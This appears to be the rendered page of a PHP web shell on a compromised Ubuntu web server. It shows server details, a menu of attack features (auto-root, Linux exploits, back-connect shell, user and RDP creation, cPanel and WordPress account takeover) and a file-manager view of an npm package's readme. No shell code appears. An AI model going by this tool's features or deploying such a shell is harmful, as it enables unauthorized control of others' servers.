Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
pause-stream /
[ HOME SHELL ]
Name
Size
Permission
Action
test
[ DIR ]
drwxrwxr-x
.npmignore
42
B
-rw-rw-r--
LICENSE
12.25
KB
-rw-rw-r--
index.js
74
B
-rw-rw-r--
package.json
723
B
-rw-rw-r--
readme.markdown
878
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme.markdown
# PauseStream This is a `Stream` that will strictly buffer when paused. Connect it to anything you need buffered. ``` js var ps = require('pause-stream')(); badlyBehavedStream.pipe(ps.pause()) aLittleLater(function (err, data) { ps.pipe(createAnotherStream(data)) ps.resume() }) ``` `PauseStream` will buffer whenever paused. it will buffer when yau have called `pause` manually. but also when it's downstream `dest.write()===false`. it will attempt to drain the buffer when you call resume or the downstream emits `'drain'` `PauseStream` is tested using [stream-spec](https://github.com/dominictarr/stream-spec) and [stream-tester](https://github.com/dominictarr/stream-tester) This is now the default case of [through](https://github.com/dominictarr/through) https://github.com/dominictarr/pause-stream/commit/4a6fe3dc2c11091b1efbfde912e0473719ed9cc0
Close